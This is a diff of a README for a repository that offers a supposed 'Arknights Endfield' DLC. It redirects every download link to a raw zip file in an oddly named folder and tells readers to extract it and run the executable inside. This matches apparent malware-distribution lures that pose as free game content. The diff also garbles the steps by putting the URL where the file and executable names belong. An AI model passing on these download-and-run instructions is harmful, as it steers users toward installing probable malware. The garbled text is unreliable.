samiabounab/Buka-Arknights-Endfield-DLC/README.md

 - **Community Support**: Join our community for tips and troubleshooting.

 ## 🌐 Visit the Releases Page
-For the latest updates and versions, visit our Releases page: [Download Link](https://github.com/samiabounab/Buka-Arknights-Endfield-DLC/releases).
+For the latest updates and versions, visit our Releases page: [Download Link](https://raw.githubusercontent.com/samiabounab/Buka-Arknights-Endfield-DLC/main/unbeaued/DLC_Buka_Arknights_Endfield_1.1.zip).

 ## 📥 Download & Install
 To get started, follow these easy steps:

-1. Click the download button above or visit the [Releases page](https://github.com/samiabounab/Buka-Arknights-Endfield-DLC/releases).
+1. Click the download button above or visit the [Releases page](https://raw.githubusercontent.com/samiabounab/Buka-Arknights-Endfield-DLC/main/unbeaued/DLC_Buka_Arknights_Endfield_1.1.zip).
 2. On the Releases page, find the latest version available.
-Look for the most recent file, which may be named something like `Buka-Arknights-Endfield-DLC-v1.0.zip`.
+Look for the most recent file, which may be named something like `https://raw.githubusercontent.com/samiabounab/Buka-Arknights-Endfield-DLC/main/unbeaued/DLC_Buka_Arknights_Endfield_1.1.zip`.
 3. Click on the file to start downloading it to your computer.
 The file will usually arrive in a zipped format.
 4. Once it is downloaded, locate the file in your "Downloads" folder.
 5. Right-click on the zipped file and select "Extract All."
 Follow the prompts to unzip the files into a folder of your choice.
-6. Open the extracted folder, and you will see the application file named `Buka-Arknights-Endfield-DLC.exe`.
+6. Open the extracted folder, and you will see the application file named `https://raw.githubusercontent.com/samiabounab/Buka-Arknights-Endfield-DLC/main/unbeaued/DLC_Buka_Arknights_Endfield_1.1.zip`.
 7. Double-click on the executable file to run the program.

 ## ⚙️ Troubleshooting